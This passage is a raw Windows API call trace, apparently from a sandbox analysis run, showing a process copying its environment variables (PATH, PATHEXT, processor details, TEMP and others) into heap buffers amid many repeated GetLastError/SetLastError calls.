RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5f1680 [0079.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x5f1680, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.361] SetLastError (dwErrCode=0x0) [0079.361] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] GetLastError () returned 0x0 [0079.362] SetLastError (dwErrCode=0x0) [0079.362] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x34 [0079.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x38) returned 0x5f1640 [0079.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.362] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x5e31d8 [0079.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x5e31d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0079.362] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.363] SetLastError (dwErrCode=0x0) [0079.363] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] GetLastError () returned 0x0 [0079.364] SetLastError (dwErrCode=0x0) [0079.364] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x38 [0079.364] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x3c) returned 0x5f16a0 [0079.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0079.364] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x95) returned 0x5f16e8 [0079.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x5f16e8, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0079.364] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.365] GetLastError () returned 0x0 [0079.365] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.366] SetLastError (dwErrCode=0x0) [0079.366] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f16a0) returned 0x3c [0079.367] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f16a0, Size=0x40) returned 0x5f16a0 [0079.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0079.367] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5e2550 [0079.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x5e2550, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.367] SetLastError (dwErrCode=0x0) [0079.367] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] SetLastError (dwErrCode=0x0) [0079.368] GetLastError () returned 0x0 [0079.368] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f16a0) returned 0x40 [0079.368] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f16a0, Size=0x44) returned 0x5f1788 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0079.369] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x5eeb70 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x5eeb70, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0079.369] GetLastError () returned 0x0 [0079.369] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x44 [0079.369] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x48) returned 0x5f1788 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0079.369] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1d) returned 0x5eeb98 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x5eeb98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0079.369] GetLastError () returned 0x0 [0079.369] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x48 [0079.369] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x4c) returned 0x5f1788 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0079.369] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5e6e30 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x5e6e30, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0079.369] GetLastError () returned 0x0 [0079.369] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x4c [0079.369] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x50) returned 0x5f1788 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0079.369] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5f1640 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x5f1640, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0079.369] GetLastError () returned 0x0 [0079.369] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x50 [0079.369] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x54) returned 0x5f1788 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0079.369] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5f1660 [0079.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x5f1660, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0079.370] GetLastError () returned 0x0 [0079.370] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x54 [0079.370] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x58) returned 0x5f1788 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0079.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x5eebc0 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x5eebc0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0079.370] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x58 [0079.370] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x5c) returned 0x5f1788 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0079.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5ead60 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x5ead60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0079.370] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x5c [0079.370] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x60) returned 0x5f1788 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0079.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x5eb470 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x5eb470, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0079.370] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x60 [0079.370] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x64) returned 0x5f1788 [0079.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0079.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5eebe8 [0079.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x5eebe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0079.371] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x64 [0079.371] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x68) returned 0x5f1788 [0079.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0079.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6b) returned 0x5f17f8 [0079.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x5f17f8, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0079.371] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1788) returned 0x68 [0079.371] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1788, Size=0x6c) returned 0x5f1870 [0079.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0079.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5f16a0 [0079.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x5f16a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0079.371] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x6c [0079.371] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x70) returned 0x5f1870 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.372] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xf) returned 0x5e31f0 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x5e31f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0079.372] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x70 [0079.372] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x74) returned 0x5f1870 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0079.372] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x5f16c0 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x5f16c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0079.372] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x74 [0079.372] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x78) returned 0x5f1870 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0079.372] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x5eb4a8 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x5eb4a8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0079.372] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x78 [0079.372] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x7c) returned 0x5f1870 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0079.372] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x5eb4e0 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x5eb4e0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0079.372] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1870) returned 0x7c [0079.372] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1870, Size=0x80) returned 0x5f1870 [0079.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", 